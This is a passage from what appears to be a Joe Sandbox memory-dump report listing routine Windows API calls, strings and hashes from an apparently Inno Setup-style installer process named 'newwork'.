                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: LoadString$FileMessageModuleName
                                                                                • String ID:
                                                                                • API String ID: 704749118-0
                                                                                • Opcode ID: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                • Instruction ID: 7d65b0a5aa49ad722f3f3263bbe29e3330acee4661d9e2153cfe083702b22da2
                                                                                • Opcode Fuzzy Hash: ede814ba8b2c905ab74f80468cae56b5ab65d73ed59c96bbcc76a4520df8398d
                                                                                • Instruction Fuzzy Hash: 1F3123716083849AD370EB65C945BDF77D89B85704F40483FB6C8E72D1EB7859048B6B
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E90D
                                                                                  • Part of subcall function 0044CF50: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044CF82
                                                                                • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E991
                                                                                  • Part of subcall function 0042BBB4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBC8
                                                                                • IsRectEmpty.USER32(?), ref: 0044E953
                                                                                • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E976
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                                • String ID:
                                                                                • API String ID: 855768636-0
                                                                                • Opcode ID: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                • Instruction ID: f7bad605b8f68185b4e834990bb8ca2287257270a928060092b59a923d315d7c
                                                                                • Opcode Fuzzy Hash: a4575d285c62c1c56b7686ad69dfdc5ef60a631fed5d3d1fc0705a1474777ead
                                                                                • Instruction Fuzzy Hash: E5114A71B0030067E650BA7B8C86B5B76C9AB88748F15083FB545EB387DE7DDD094299
                                                                                APIs
                                                                                • OffsetRect.USER32(?,?,00000000), ref: 00495988
                                                                                • OffsetRect.USER32(?,00000000,?), ref: 004959A3
                                                                                • OffsetRect.USER32(?,?,00000000), ref: 004959BD
                                                                                • OffsetRect.USER32(?,00000000,?), ref: 004959D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: OffsetRect
                                                                                • String ID:
                                                                                • API String ID: 177026234-0
                                                                                • Opcode ID: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                • Instruction ID: 9409249b62c1188f54b5b62e2685c04785358b71117f53a2337039625fc08c68
                                                                                • Opcode Fuzzy Hash: e6cd63ab1267e2bef36e0ea42f4f89ffcc49fa5b03609306a0fb63f812f5ac90
                                                                                • Instruction Fuzzy Hash: 1121AEB6700701AFDB00DE69CD81E5BB7DAEFC4350F248A2AF944C3249D638ED048761
                                                                                APIs
                                                                                • GetCursorPos.USER32 ref: 00417260
                                                                                • SetCursor.USER32(00000000), ref: 004172A3
                                                                                • GetLastActivePopup.USER32(?), ref: 004172CD
                                                                                • GetForegroundWindow.USER32(?), ref: 004172D4
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                                • String ID:
                                                                                • API String ID: 1959210111-0
                                                                                • Opcode ID: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                • Instruction ID: de3f0dc6b436800086b9427ec8ddd2ec86eeedce3a35093462374e80c8eda50e
                                                                                • Opcode Fuzzy Hash: 0325eb73ca892009698aa7541b5e3073a06fcfb7bd7d3fb361e05756697ccdec
                                                                                • Instruction Fuzzy Hash: C52183313086118AD720AFA9E945AE733F1EF44754B0544ABF8558B352DB3DDC82CB9E
                                                                                APIs
                                                                                • MulDiv.KERNEL32(?,00000008,?), ref: 004955F1
                                                                                • MulDiv.KERNEL32(?,00000008,?), ref: 00495605
                                                                                • MulDiv.KERNEL32(?,00000008,?), ref: 00495619
                                                                                • MulDiv.KERNEL32(?,00000008,?), ref: 00495637
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID:
                                                                                • API String ID:
                                                                                • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                • Instruction ID: b77f8f3c6746ea581d036ce488ab013aedd37a602364075716cddbfd1b85439e
                                                                                • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                                • Instruction Fuzzy Hash: A5112E72604504ABCB40DEA9D8C4D9B7BECEF8D324B6441AAF908DB242D674ED408B68
                                                                                APIs
                                                                                • GetClassInfoA.USER32(00400000,0041F470,?), ref: 0041F4A1
                                                                                • UnregisterClassA.USER32(0041F470,00400000), ref: 0041F4CA
                                                                                • RegisterClassA.USER32(00499598), ref: 0041F4D4
                                                                                • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F50F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                                • String ID:
                                                                                • API String ID: 4025006896-0
                                                                                • Opcode ID: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                • Instruction ID: 7a0dc659497f48f9aad4428a0df7724adcaf244520b53866b591a9b3b5545ee4
                                                                                • Opcode Fuzzy Hash: 2789f09181fedf2aa8f29be774d1bfe7920984f559ea6f8e8637ed1726722249
                                                                                • Instruction Fuzzy Hash: F6011B72240104AADA10EBACED81E9B33999729314B11423BB615E72A2D6399C558BAC
                                                                                APIs
                                                                                • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                • String ID:
                                                                                • API String ID: 4071923889-0
                                                                                • Opcode ID: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                • Opcode Fuzzy Hash: 8aa0dd6ec5a68f6f7641eb82506f7728cd0b20fc7582fe19e2ee2bc87ac6724f
                                                                                • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                APIs
                                                                                • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D027
                                                                                • LoadResource.KERNEL32(00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58,0000000A,00000000), ref: 0040D041
                                                                                • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?,?,0047CB58), ref: 0040D05B
                                                                                • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A7C8,00400000,00000001,00000000,?,0040CF84,00000000,?,00000000,?), ref: 0040D065
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Resource$FindLoadLockSizeof
                                                                                • String ID:
                                                                                • API String ID: 3473537107-0
                                                                                • Opcode ID: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                • Instruction ID: ce77ce8360aa458f47a01e9b0563465317cd85cc21d7bcd45488e041df035c61
                                                                                • Opcode Fuzzy Hash: f701ce4f04cb0ebdd1143b5585c75acb70ffd029a82b31343d3be87257736b7b
                                                                                • Instruction Fuzzy Hash: 49F04F726056046F9B14EE59A881D5B77ECDE88268310013AF908E7286DA38DD018B68
                                                                                APIs
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 004705F1
                                                                                Strings
                                                                                • Unsetting NTFS compression on file: %s, xrefs: 004705D7
                                                                                • Failed to set NTFS compression state (%d)., xrefs: 00470602
                                                                                • Setting NTFS compression on file: %s, xrefs: 004705BF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                                • API String ID: 1452528299-3038984924
                                                                                • Opcode ID: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                • Instruction ID: 452327faed6fd823952186a677ff1a78a18aba12ee86070aec797b5412e08bdc
                                                                                • Opcode Fuzzy Hash: 4a85a403c5f553919e8eb8264edf58c674aea38054a880eb2495f4adb197a451
                                                                                • Instruction Fuzzy Hash: A5018B71D09248A6CB04D7AD94512DDBBE49F4D314F44C5FFE459D7342DB780A088B9E
                                                                                APIs
                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 0046FE45
                                                                                Strings
                                                                                • Failed to set NTFS compression state (%d)., xrefs: 0046FE56
                                                                                • Unsetting NTFS compression on directory: %s, xrefs: 0046FE2B
                                                                                • Setting NTFS compression on directory: %s, xrefs: 0046FE13
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast
                                                                                • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                                • API String ID: 1452528299-1392080489
                                                                                • Opcode ID: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                • Instruction ID: 6c3eba688a3488f6cff2036d9eec8e6f632fba0cce39d579df3f4bd3b957a0ce
                                                                                • Opcode Fuzzy Hash: 01501a136b81c39b7c411191948b84cc59583678e1d21d505a98b8108a1a9e37
                                                                                • Instruction Fuzzy Hash: E5014421E0824856CB04D7ADE44129DBBA49F49304F4485BBA495E7253EB790A09879B
                                                                                APIs
                                                                                  • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                • RegDeleteValueA.ADVAPI32(?,00000000,?,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000,0045B7D5), ref: 00455DD8
                                                                                • RegCloseKey.ADVAPI32(00000000,?,00000000,?,00000002,00000000,?,?,00000000,0045B7AE,?,?,?,?,?,00000000), ref: 00455DE1
                                                                                • RemoveFontResourceA.GDI32(00000000), ref: 00455DEE
                                                                                • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 00455E02
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                                • String ID:
                                                                                • API String ID: 4283692357-0
                                                                                • Opcode ID: f8aea33aa1dfe48501da451cbaaab358c9a7ac193b9fd61d7dd35e15a1d684ec
                                                                                • Instruction ID: 71ccc6c4ad223293e5fa71c014565a1ca4f3f808124b73c5b0663eb55104ffd2
                                                                                • Opcode Fuzzy Hash: f8aea33aa1dfe48501da451cbaaab358c9a7ac193b9fd61d7dd35e15a1d684ec
                                                                                • Instruction Fuzzy Hash: 57F0BEB174070036EA10B6BAAC4BF2B26CC8F54745F10883ABA00EF2C3D97CDC04962D
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$CountSleepTick
                                                                                • String ID:
                                                                                • API String ID: 2227064392-0
                                                                                • Opcode ID: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                • Instruction ID: 56d8cd0ebf6ab4a4d31aad6ab38b951dee0ff9c0bbbb70c30f4e079d31b44593
                                                                                • Opcode Fuzzy Hash: dfa0650b41a5fbb69b4da717be5ba207ba5450cdb50d9376c11a56b5a3797e8a
                                                                                • Instruction Fuzzy Hash: C6E0ED6A30921149863131AE98CA6AF4D48CBC2324B28853FE08CE6283C89C4C0A867E
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB,00000000), ref: 0047820D
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8,?,?,?,?,?,00498CDB), ref: 00478213
                                                                                • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478235
                                                                                • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,004812C8), ref: 00478246
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                                • String ID:
                                                                                • API String ID: 215268677-0
                                                                                • Opcode ID: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                • Instruction ID: 91f0679cb69370e855683a510bc75a037ced8834772831ea40795c83ba0b1c60
                                                                                • Opcode Fuzzy Hash: 89672e1c1dad377db11468aaf314ccfc00159a4e206af17bba33db1213e8e157
                                                                                • Instruction Fuzzy Hash: D8F037716447007BD600E6B58C81E5B73DCEB44354F04493E7E98C71C1DA78DC089776
                                                                                APIs
                                                                                • GetLastActivePopup.USER32(?), ref: 0042424C
                                                                                • IsWindowVisible.USER32(?), ref: 0042425D
                                                                                • IsWindowEnabled.USER32(?), ref: 00424267
                                                                                • SetForegroundWindow.USER32(?), ref: 00424271
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                                • String ID:
                                                                                • API String ID: 2280970139-0
                                                                                • Opcode ID: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                • Instruction ID: 2c5ff33fc315f6eb6fab431e1453bcb0e66c5aaaa6596e28cc8dc28fd0b03a53
                                                                                • Opcode Fuzzy Hash: d317456c615bf9008b67529b06aff5f9fae4f5f479d94640f2b11ca0dbd6cbb7
                                                                                • Instruction Fuzzy Hash: C7E0EC61B02672D6AE31FA7B2881A9F518C9D45BE434641EBBC04FB38ADB2CDC1141BD
                                                                                APIs
                                                                                • GlobalHandle.KERNEL32 ref: 0040626F
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00406276
                                                                                • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 0040627B
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00406281
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Global$AllocHandleLockUnlock
                                                                                • String ID:
                                                                                • API String ID: 2167344118-0
                                                                                • Opcode ID: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                • Instruction ID: 5df08fd8dc2b017785a639aa93036e57be915985ffe03f20f856cac12e18577c
                                                                                • Opcode Fuzzy Hash: cbc5b304f88c7a08b053d0b09bd11fc9f2d944e51c7d356257a26bde9ab667b0
                                                                                • Instruction Fuzzy Hash: 0BB009C4810A01BEEC0473B24C0BE3F245CD88172C3904A6F3448BA183987C9C405A3A
                                                                                APIs
                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047BB01,?,00000000,00000000,00000001,00000000,0047A4B5,?,00000000), ref: 0047A479
                                                                                Strings
                                                                                • Failed to parse "reg" constant, xrefs: 0047A480
                                                                                • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 0047A2ED
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Close
                                                                                • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                                • API String ID: 3535843008-1938159461
                                                                                • Opcode ID: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                • Instruction ID: 25f2a786541cb687838a6194ffc4a73185deb9e5551b5ad8c851c0bf1152322b
                                                                                • Opcode Fuzzy Hash: 05ee6b3b67afee6859f894b9066335fb286a048b1f35c691c8bdca609618c678
                                                                                • Instruction Fuzzy Hash: 22817274E00108AFCB10DF95D485ADEBBF9AF88344F50817AE814B7392D739AE05CB99
                                                                                APIs
                                                                                • GetForegroundWindow.USER32(00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835C5
                                                                                • SetActiveWindow.USER32(?,00000000,00483716,?,00000000,00483757,?,?,?,?,00000000,00000000,00000000,?,0046BD99), ref: 004835D7
                                                                                Strings
                                                                                • Will not restart Windows automatically., xrefs: 004836F6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
